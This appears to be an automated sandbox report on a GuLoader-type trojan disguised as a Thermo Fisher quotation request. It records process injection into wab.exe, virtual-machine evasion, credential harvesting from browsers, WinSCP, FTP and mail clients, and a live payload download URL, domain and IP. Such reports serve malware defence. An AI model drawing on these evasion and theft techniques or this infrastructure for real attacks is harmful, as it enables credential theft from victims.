Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	API/Special instruction interceptor: Address: 780F23A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	API/Special instruction interceptor: Address: 6C2F23A

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 29A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 37C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 37B00000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\LangDLL.dll	Jump to dropped file

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Code function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_00405C60
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Code function: 0_2_004068B1 FindFirstFileW,FindClose,	0_2_004068B1

Source: wab.exe, 00000002.00000002.91546935226.0000000007BB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWq
Source: wab.exe, 00000002.00000002.91546935226.0000000007BB6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007B48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	API call chain: ExitProcess graph end node			graph_0-4825
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	API call chain: ExitProcess graph end node			graph_0-4832

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

Code function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,

0_2_00405C60

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

0_2_6FE71BFF

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000			Jump to behavior
Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 29AFEB0			Jump to behavior

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe

0_2_0040352F

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000002.00000002.91557808162.0000000037C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	111 Process Injection	12 Virtualization/Sandbox Evasion	1 Credentials in Registry	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Disable or Modify Tools	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	126 System Information Discovery	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Thermo Fisher RFQ_TFS-1207.com.exe	50%	ReversingLabs	Win32.Trojan.Generic
Thermo Fisher RFQ_TFS-1207.com.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\LangDLL.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\UserInfo.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsDialogs.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsExec.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://crl.comodo	0%	Avira URL Cloud	safe
https://synergyinnovationsgroup.com/	100%	Avira URL Cloud	phishing
https://synergyinnovationsgroup.com/wPKxzs124.bin	100%	Avira URL Cloud	phishing
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
https://synergyinnovationsgroup.com/wPKxzs124.bint#	100%	Avira URL Cloud	phishing
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
https://synergyinnovationsgroup.com/B	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
synergyinnovationsgroup.com	199.217.106.226	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://synergyinnovationsgroup.com/wPKxzs124.bin	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://synergyinnovationsgroup.com/	wab.exe, 00000002.00000002.91546935226.0000000007BA6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.quovadis.bm0	wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://synergyinnovationsgroup.com/wPKxzs124.bint#	wab.exe, 00000002.00000002.91546935226.0000000007B48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://nsis.sf.net/NSIS_ErrorError	Thermo Fisher RFQ_TFS-1207.com.exe, 00000000.00000000.86449721470.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Thermo Fisher RFQ_TFS-1207.com.exe, 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.comodo	wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://synergyinnovationsgroup.com/B	wab.exe, 00000002.00000002.91546935226.0000000007BA6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
199.217.106.226	synergyinnovationsgroup.com	United States		33083	AXCELX-NETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501414
Start date and time:	2024-08-29 21:53:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Thermo Fisher RFQ_TFS-1207.com.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/13@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 93% Number of executed functions: 96 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
Execution Graph export aborted for target wab.exe, PID 2668 because it is empty
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Thermo Fisher RFQ_TFS-1207.com.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
199.217.106.226	AWB 9869692024 Clearance Doc.exe	Get hash	malicious	Remcos, GuLoader	Browse	www.manjeetsteelproductions.com/YBEZddPio157.bin
	Payment Copy 486667.exe	Get hash	malicious	Remcos, GuLoader	Browse	www.manjeetsteelproductions.com/larVuzdzFnPsjspJSGQvhHyIW255.bin
	TRIAL_ORDER_OTHERS.exe	Get hash	malicious	FormBook, GuLoader	Browse	synexenergygroup.net/PnbzhHImguIPb128.bin
	IMG_INVENTORY_LIST.exe	Get hash	malicious	FormBook, GuLoader	Browse	synexenergygroup.net/ZdeTTaG65.bin
	Request For Quotation 34333.exe	Get hash	malicious	Remcos, GuLoader	Browse	www.manjeetsteelproductions.com/IRrnYokuAbeBX51.bin
	FedEX Arrival - AWB# 102235508763.exe	Get hash	malicious	GuLoader	Browse	www.manjeetsteelproductions.com/fOdHnpSDXn91.bin
	Pepsico Company Profile.exe	Get hash	malicious	GuLoader	Browse	www.synergyinnovationsgroup.com/vWyDrlGiCMSupEsdddOxmUDB222.bin
	SecuriteInfo.com.FileRepMalware.11227.27096.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	www.synergyinnovationsgroup.com/WJIlwQHyz37.bin
	SecuriteInfo.com.FileRepMalware.15088.20650.exe	Get hash	malicious	GuLoader	Browse	www.synergyinnovationsgroup.com/ohhzRs20.bin
	FedEX Arrival - AWB# 102235506763.exe	Get hash	malicious	Remcos, GuLoader	Browse	manjeetsteelproductions.com/rtGfK70.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
synergyinnovationsgroup.com	YMOqAm713i.exe	Get hash	malicious	GuLoader	Browse	199.217.106.226
	mbdcKkZ3Ag.exe	Get hash	malicious	GuLoader	Browse	199.217.106.226
	BCXV7eBAlV.exe	Get hash	malicious	GuLoader	Browse	199.217.106.226
	sihost.exe	Get hash	malicious	GuLoader	Browse	199.217.106.226

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AXCELX-NETUS	YMOqAm713i.exe	Get hash	malicious	GuLoader	Browse	199.217.106.226
	mbdcKkZ3Ag.exe	Get hash	malicious	GuLoader	Browse	199.217.106.226
	AWB 9869692024 Clearance Doc.exe	Get hash	malicious	Remcos, GuLoader	Browse	199.217.106.226
	Payment Copy 486667.exe	Get hash	malicious	Remcos, GuLoader	Browse	199.217.106.226
	TRIAL_ORDER_OTHERS.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.217.106.226
	IMG_INVENTORY_LIST.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.217.106.226
	Request For Quotation 34333.exe	Get hash	malicious	Remcos, GuLoader	Browse	199.217.106.226
	HSBC Advice_ACH Credit.com.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	199.217.106.226
	FedEX Arrival - AWB# 102235508763.exe	Get hash	malicious	GuLoader	Browse	199.217.106.226
	sihost.exe	Get hash	malicious	GuLoader	Browse	199.217.106.226

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Vidar	Browse	199.217.106.226
	Invoice.wsf	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	199.217.106.226
	x64_installer__v4.6.0.msi	Get hash	malicious	Unknown	Browse	199.217.106.226
	SHIPMENT_DOCMSS24071327.exe	Get hash	malicious	GuLoader	Browse	199.217.106.226
	hhs.exe	Get hash	malicious	Unknown	Browse	199.217.106.226
	x64_installer__v4.5.9.msi	Get hash	malicious	Unknown	Browse	199.217.106.226
	3Ojkq6hcM1.msi	Get hash	malicious	Unknown	Browse	199.217.106.226
	Nettably.exe	Get hash	malicious	Snake Keylogger	Browse	199.217.106.226
	WEAREX_IHRACAT.exe	Get hash	malicious	GuLoader	Browse	199.217.106.226
	Fordybendes.exe	Get hash	malicious	Azorult, GuLoader	Browse	199.217.106.226

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll	TRIAL_ORDER_CP.exe	Get hash	malicious	FormBook, GuLoader	Browse
	TRIAL_ORDER_CP.exe	Get hash	malicious	GuLoader	Browse
	Thermo Fisher RFQ_TFS-1805.xls	Get hash	malicious	GuLoader	Browse
	FedEx Shipping Confirmation.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	IMG_00991ORDER_FILES.exe	Get hash	malicious	FormBook, GuLoader	Browse
	FedEx Shipping Confirmation.exe	Get hash	malicious	GuLoader	Browse
	IMG_00991ORDER_FILES.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx	Get hash	malicious	Unknown	Browse
	AKgHw6grDP.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\LangDLL.dll	TRIAL_ORDER_CP.exe	Get hash	malicious	FormBook, GuLoader	Browse
	TRIAL_ORDER_CP.exe	Get hash	malicious	GuLoader	Browse
	Thermo Fisher RFQ_TFS-1805.xls	Get hash	malicious	GuLoader	Browse
	FedEx Shipping Confirmation.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	IMG_00991ORDER_FILES.exe	Get hash	malicious	FormBook, GuLoader	Browse
	FedEx Shipping Confirmation.exe	Get hash	malicious	GuLoader	Browse
	IMG_00991ORDER_FILES.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Roundness.ind

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	data
Category:	dropped
Size (bytes):	385015
Entropy (8bit):	1.253279247179919
Encrypted:	false
SSDEEP:	1536:kVTcKVFuJi5LXKLywcEhXygCilGHIQXMUmMAI:ywKLNLaLywRXygCilGzmMAI
MD5:	84182132BEAC6B4CDD42AE3C3504778F
SHA1:	9844B9B4ABEAC7B410809A582FE2E41BD38876A3
SHA-256:	5A2A01A88EC9FF56B80D957E4C5891A020435407F81DADA05DE58165C0C86F2D
SHA-512:	054C17E8AC2EDED927F24E77A81FBA74498C9F3ABD07F5E42D6F9E20A58D47D9C30FF1060CC8626DE93FDD5BBA2A0503FF61EC7F4F70858871C15E63DDC48A7F
Malicious:	false
Reputation:	low
Preview:	....E..........;................../..r.....5...............e......9...............................S............................................e..........................E..........................W.................................8....................j......3....................X............................Ql....T.................>g...'.............[...l...P.................................\|................................q.....................3........v......t....H............................................s.................................................................................................................................................f....................................................................(..................................................;..$..................................................................o.-.........................................................l................. ...............................................Q......................

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Skremaskiner.Vig

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	data
Category:	dropped
Size (bytes):	295052
Entropy (8bit):	7.649643489698229
Encrypted:	false
SSDEEP:	6144:d5dDGsxj8/O4S6dAWxD5cHH3B3BZY8cdP5t2Z0:RD38/NBAW0HX3ZY86Bt+0
MD5:	87FC203CBBB62A9A54DF6DC6C05746DC
SHA1:	17FD595731DD4A17400EB51A1ED4DFE553DD5B8C
SHA-256:	F0C74501FA71948FD95D65EEA5697D3E5CED4D8F507F053D355C3A333DD0A29E
SHA-512:	08ED5ACC005284E127FDC2B76B2C19D9C86A65DB20DBEB8D6360CF4CEC263D199C095AC9DCC7858A756515C77B75221490DE9D4D605DB06C66D76A097B10AE6D
Malicious:	false
Reputation:	low
Preview:	............55....a........+......................yy.........................E......nnnnnn.\|......%.....}...jj.;.~~~....................D.......xxx.BBBBBB........,...tt.............................W..mm..p.."""..N................OO...............!!..]......x.k.XXX.'...............................N.c.}........%%...............R....ll.......Z................&...............55.h........uu.................::...........(((.a.X..........gg.....N.U......tt..ZZZ...................x.......aa................... ..............??...kkk.....ssss....uu.........................A............i.......................................................................X.......NNN........x.0....5555......99.....>>>>>..............V.....SSS...................11..G.....................'.a..............._...............A..00..............88..............................^..?..........................vv..JJJJJJJJ............w....jjj.....................!..........hhh.ll........)))))...".k..........>.....%%%%......

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards\freemanship.txt

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	ASCII text, with very long lines (304), with no line terminators
Category:	dropped
Size (bytes):	304
Entropy (8bit):	4.14301130689188
Encrypted:	false
SSDEEP:	6:3CUzIrGx4igCDYUuTjAtLGafWWl2iEOQkAtj/jLsTzOwJT4HCALn:3CCF4igCDYA5Ga+Wl2iEOTAJryO8MHCu
MD5:	EF6FDEDE5EA8DBEF391FEC35BE82A5FC
SHA1:	6C88262F78E8B11651EEB6534F09C65CD0A8F8BB
SHA-256:	37B39724FD3B7FE48E1D65DA1A69BF4DBF809F34C67BAC7C4DA13F93DA9BE856
SHA-512:	5FB53ADEADB7C464A13EEECE64ADD35F972425D55447FFB84A277689BA3F4D5861A43B2883CB0744F98F164F2802C567F9969F777B98CE4609D28A64ED1101FD
Malicious:	false
Reputation:	low
Preview:	skydestigens dilettanist defmrkers,drmmene sprometrets taklingens crokinole ligegladestes,ultraremuneration dkketallerkners uncustomed filoversigterne.atomize koncentrationsevnens arthropodal epilepsis vakuums stabelvis lnregulering,catv skrivemaskinebordenes skydningerne.solanin godkendelsens gasogene.

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards\pressurization.pra

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	data
Category:	dropped
Size (bytes):	269664
Entropy (8bit):	1.2446463566225683
Encrypted:	false
SSDEEP:	768:3wSokH49c7ZKiDm+1Qer3C4XkGB3luG3fCHoEHKM/yP35tuIJ95oV31XfCp43UtM:55+1GbuKvP32IqV1fmPU0VicgRx
MD5:	084CDF1FE8920EACBC8DC0E839D9E5A7
SHA1:	5BB2E4E15941AC2AB4287A58F671B82DA5C9A384
SHA-256:	A6EB01651C833919FC27F9B7DD2B5C6D9F9DD8766BC7848679B5E664ECC6C8A7
SHA-512:	F856C41F540B7BD8233179CC752E63E4C88C1BBC38739B4FAF3DA09675B13FBC0219458AFE95D4C1DD481B35BB69DC9B66C2269C64B106DE3659A51CE9AE1B42
Malicious:	false
Reputation:	low
Preview:	...E.......c...............................0...............................................................c........................................n.......Y................................P..........................................................................................$........................................~.........................1...Z....................................m......................=.......................U............................................[....................................}.=..................-..........................................................t........................-....................m..............V...................................................................q............m.X..................................c....................................................................................'.........................T...R.............................................................^............\|................................

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards\restriktivitets.bnk

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	data
Category:	dropped
Size (bytes):	131403
Entropy (8bit):	1.2526174536345023
Encrypted:	false
SSDEEP:	768:GGj5fMy6uanycN+gN/qEN+bHeC6roJdAGpeBgXU9ZWNAnu/Fkutb:L3l0fDkwaPA
MD5:	9AD6681DD2B309E6ACE142096F9E2870
SHA1:	5E02434342A98589A29B7E389E88DD4C60F09A8A
SHA-256:	576D2CD521891CF9C598B3CA0DADB89BD36CDE96B3F86F1CD27BF4FFCCE863CB
SHA-512:	28CFECE5E00AAB59758864503F4A9058EEF2FDFC8B73204ABF1E3B41011FBE5D9EAC3595E2EFA0E3B740B82F285B7EC8E42EA5DD42C39E5EFF39735A9C051CBB
Malicious:	false
Preview:	.............................>...................a...............................................>...............................Z......2.....................................................................U.................................J.....................................................................A@...Y..C..................1{.......................................................(.....................................................^......................................................V...........5.............................d.................................................+....{............................N........?.......................c.........y.........................................U................................:...................Y..........................................O....................!.......D.................................................}.....................................................................................................".......

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards\tresindstyvendedeles.ord

Download File

Process:	C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe
File Type:	data
Category:	dropped
Size (bytes):	407199
Entropy (8bit):	1.2437541055056829
Encrypted:	false
